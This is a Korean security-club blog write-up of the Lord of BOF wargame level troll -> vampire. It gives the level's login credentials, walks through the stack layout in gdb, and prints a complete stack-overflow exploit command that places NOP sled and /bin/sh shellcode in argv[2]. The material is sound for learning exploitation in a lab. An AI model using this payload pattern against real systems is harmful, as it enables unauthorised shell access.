Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- hackerrank
- 숙명여자대학교 정보보안 동아리
- siss
- 파이썬
- Javascript
- 백준
- C언어
- BOJ
- BOJ Python
- SWEA
- HTML
- 자료구조 복습
- 숙명여자대학교 정보보안동아리
- lob
- hackctf
- c
- c++
- CSS
- 기계학습
- The Loard of BOF
- 머신러닝
- Sookmyung Information Security Study
- 풀이
- Python
- 생활코딩
- 드림핵
- 웹페이지 만들기
- WarGame
- XSS Game
- PHP 웹페이지 만들기
Archives
- Today
- Total
혜랑's STORY
[LOB Redhat] Lv.9 troll -> vampire 본문
문제를 풀기 위해 xshell로 로그인 해 주었다.
ID : troll / PW : aspirin |
가장 먼저 존재하는 파일들을 알아보기 위해 ls -l 명령어를 실행하였다.
vampire.c 파일의 내용을 확인해 보았다.
이번엔 46번째 자리의 값이 "\xff"가 되면 안되는 것 같다. 즉, Return address에 그보다 작은 주소를 주려면 엄청 큰 값을 넣으면 될 것 같다.
일단 vampire 파일을 복사한 뒤
gdb를 사용하여 main 함수의 어셈블리 코드를 살펴보자.
gdb를 통해 스택 상황을 아래와 같다고 생각해 볼 수 있다.
buffer | SFP | RET(return) |
40 | 4 | 4 |
argv[2]의 주소를 찾기 위해 strcpy 함수가 끝나는 지점에 bp를 걸고 실행 인자로 "A"*44 + "\xbf\xbf\xbf\xbf" 와 "B"*100000을 따로 넘겨주었다.
인자를 넘겨줄 때, argv[1]에는 "A"를 argv[2]에는 "B"를 넘겨주었기 때문에 x/1000x $esp 명령어를 사용하여 메모리에 쌓여있는 것을 확인할 때, 0x41414141에서 0x42424242으로 바뀌는 지점이 바로 argv[2] 주소의 시작이다.
다행히 argv[2]의 주소가 "\xbfff~"보다 작은 값을 가지는 것 같다. 이제 "B"가 들어간 곳에 "NOP"와 쉘코드를 넣고 RET에 "B"가 들어있는 주소중 하나를 골라 넣어보자.
사용할 코드의 구조는 다음과 같다.
기존 buffer + SFP (44byte) | argv[2]의 주소 : 0xbffe7690 | NOP(100000) + shellcode |
이대로 공격 코드를 작성해 보았다.
./cpvampire `python -c 'print "A"*44 + "\x90\x76\xfe\xbf" '` `python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` |
코드를 실행시킨 결과 쉘이 실행되었다.
원본파일을 공격해 보자.
성공적으로 비밀번호를 알아내었다!
'2021 SISS 21기 활동 > 겨울방학 System' 카테고리의 다른 글
[Lazenca] Protection Tech : ASLR, Canaries (0) | 2021.02.21 |
---|---|
[LOB Redhat] Lv.8 orge -> troll (4) | 2021.02.10 |
[LOB Redhat] Lv.7 darkelf -> orge (0) | 2021.02.10 |
[LOB Redhat] Lv.6 wolfman -> darkelf (0) | 2021.02.10 |
[Lazenca] Protection Tech : NX bit (0) | 2021.02.07 |